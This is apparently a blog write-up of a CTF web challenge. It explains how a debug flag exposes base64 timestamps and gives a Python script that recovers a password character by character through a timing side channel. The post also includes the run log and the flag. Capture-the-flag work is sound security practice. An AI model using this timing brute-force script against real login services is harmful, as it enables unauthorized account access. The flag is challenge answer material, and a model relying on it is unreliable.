Description:
"Time is what we want most, but what we use worst." - William PennSolution:
Target: http://web.camsctf.com/b/
Intercept http request with Burp Suite.
debug=0 ?, try to change debug to 1
Base64 decode and get a start time and end time.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author: Kitwipat Towattana (@icheernoom) | |
import urllib, urllib2, string, re, sys | |
def minus(num): | |
return float(num[0]) - float(num[1]) | |
url_check = 'http://web.camsctf.com/b/check.php' | |
for i in list(string.printable): | |
password = sys.argv[1]+i | |
post_data = urllib.urlencode({'password' : password, 'debug' : '1'}) | |
req = urllib2.Request(url_check, post_data) | |
resp = urllib2.urlopen(req).read() | |
b64 = re.search("\"reply\":\"(.*)\"",resp).group(1) | |
print "Password {0} : {1}".format(password,b64) | |
num = b64.decode('base64').split("-") | |
result = minus(num) | |
print "Password {0} : {1}".format(password,result) | |
''' | |
root@ubuntu:~# python web300.py "" #see a different amounts of time to process. | |
...[snip]... | |
root@ubuntu:~# python web300.py "u" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uH" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>n" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#)" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#)[" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#)[K" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#)[Ks" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v" | |
...[snip]... | |
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v:" | |
...[snip]... | |
Password uHH>nN#)[Ks5v:A : MTQyOTY3MzA5OS4zMTk2LTE0Mjk2NzMwOTkuNjAwNg== | |
Password uHH>nN#)[Ks5v:A : -0.280999898911 | |
Password uHH>nN#)[Ks5v:B : MTQyOTY3MzA5OS45NjI2LTE0Mjk2NzMxMDAuMjQzNw== | |
Password uHH>nN#)[Ks5v:B : -0.281100034714 | |
Password uHH>nN#)[Ks5v:C : MTQyOTY3MzEwMC41NjUtMTQyOTY3MzEwMC44NDU1 | |
Password uHH>nN#)[Ks5v:C : -0.28049993515 | |
Password uHH>nN#)[Ks5v:D : MTQyOTY3MzEwMS4xOTU5LTE0Mjk2NzMxMDEuNDgxMw== | |
Password uHH>nN#)[Ks5v:D : -0.285400152206 | |
Password uHH>nN#)[Ks5v:E : Flag: {how_many_microseconds_did_i_waste_solving_this_0ne} | |
''' |
Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}
ไม่มีความคิดเห็น:
แสดงความคิดเห็น